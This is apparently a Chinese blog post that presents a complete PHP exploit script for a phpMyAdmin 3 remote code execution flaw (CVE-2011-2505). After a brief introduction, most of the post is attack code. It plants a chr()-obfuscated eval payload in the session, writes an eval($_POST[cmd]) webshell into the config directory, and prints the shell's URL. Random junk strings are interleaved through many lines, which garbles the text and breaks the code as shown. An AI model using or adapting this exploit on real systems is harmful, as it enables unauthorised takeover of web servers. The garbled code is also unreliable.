phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。

昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。
6 d% N' e4 M3 X* i
首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
1 b+ m% j& V% ?5 t二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。
- d6 }5 g; J7 n2 s5 F) g! V
3 c" g3 `7 t. D在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

6 O. h8 Z3 T+ L: S/ \! T& m于是写了这个php版本的exp，代码如下：

6 N: I% i" ^6 y1 X! s# y" F: ?#!/usr/bin/php
; H" F) e3 h4 K2 ?  Z<?php
6 u) X& a, p8 C9 u% w4 t* ~print_r('
+---------------------------------------------------------------------------+
3 z6 Y2 c, u: ~$ M$ spma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
0 `0 \0 F4 z) H# k" m. e  B3 qwelcome to www.t00ls.net
  U, A" L. w& e& \& R+ [5 w; dmail: oldjun@gmail.com
1 T0 h6 w- z- l' ^; V; m7 [; WAssigned CVE id: CVE-2011-2505
1 H* J5 e9 V9 v" I& i# k  p+---------------------------------------------------------------------------+
');
% s, j) ^* x* T
/**
* working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
% j) I+ c; c2 {$ b3 r! ]# W3 s  Rhost:      target server (ip/hostname)
8 R* I$ v8 C1 b- Q) c' j& o. N/ gpath:      path to pma3
* I. S5 |( ~3 l2 m3 x! d& n2 FExample:
php '.$argv[0].' localhost /pma/
1 ?' u3 F4 ?+ c! q* F+---------------------------------------------------------------------------+
( ]) X8 r; C2 g; R$ i, k');
+ L( |; d5 k# k: \& y, V0 V4 h    exit;
}
7 p( h% l3 p# l1 I1 v. V. Q
$host = $argv[1];
$path = $argv[2];
4 J' }2 B" Q2 o- C) s
3 v- t+ P! r$ @$ Z/**
* Try to determine if the directory:"config" exists
**/
  Z: v6 @- U# i. H5 |echo "[+] Try to determine if the directory:config exists....\n";
7 K" L8 M' `5 B1 |$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
% O% y1 G/ J2 S: _}
) I3 }# `. W  ?) Z' _0 e- [
/**
* Try to get token and sessionid
**/
% Z4 l" e  @) y- Z2 t  W( U- h" c) }echo "[+] Try to get token and sessionid....\n";
& F5 D7 x2 X: {3 [% S2 a& U5 g$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
- e; a) T! g5 s- A( M6 m! G& A$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
' Z- d* C8 a5 F( t) t8 B    echo "[+] tokentoken\n";
# C0 P9 l+ [" L6 {6 ]    echo "[+] Session IDsessionid\n";
( O( J9 F3 |9 A8 E; q+ {3 w9 R- Z7 v( L}else{
& W, ]" B+ W& G    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
9 k$ M0 k% O7 V7 f}

+ A: G) ?7 b/ X! I1 |+ X/**
% S8 U% v/ T# X7 ^5 m: }9 l * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
0 E) ]1 g9 ?3 \. tphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
) k) r: p% ?  V0 j( v) d; b6 s$ y2 D% g
8 T" A* Y. O: r1 V/**
* Try to create webshell
) r( z/ F# K; |* n8 t1 r& j9 u**/
echo "[+] Try to create webshell....\n";
$ P6 ~, Q0 _9 c- A. `; V. G7 j" Cphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
2 }8 o+ B, `+ t2 X- V4 J/**
, b- R' m" B. S * Try to check if the webshell was created successfully
' H" y: d' q; c; V8 b+ C**/
# R5 h% z: I2 u, i" K/ W/ J: Recho "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
8 e8 e5 i: }+ _7 S    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
* ?# V" X1 B7 l5 X" E    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
: p, y( o5 g, x3 ?( v! d% u, J8 H}
6 u' h" J' r& k. N  R+ E1 [
- S6 E/ t4 s4 Pfunction php_request($url,$data='',$cookie=''){
4 ?" f9 ~! f# ~  Q/ Y+ i- U" z$ x9 j    global  $host, $path;
$ G: `5 M3 M/ |' W/ H5 c  ~- W   
    $method=$data?'POST':'GET';
   
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
% K" O4 \& D" j2 g3 X. a7 t    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
9 r/ r8 l" r+ M* D  E; k! i    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

. j" Z1 U7 y9 Z- v+ _8 b% v    $fp = fsockopen(gethostbyname($host), 80);
) S; }% g( A8 p0 _    if (!$fp) {
    echo 'No response from '.$host; die;
4 n* P! ~; _9 ~0 S8 H: x    }
    fputs($fp, $packet);

    $resp = '';
6 r3 ?2 x# j' y
    while ($fp && !feof($fp))
9 h% Z. A* _# T& T4 R' |( t9 v        $resp .= fread($fp, 1024);
; M) O4 E% u4 N( n9 K
    return $resp;
# J' w" G( ]/ G( g}
   
?>
.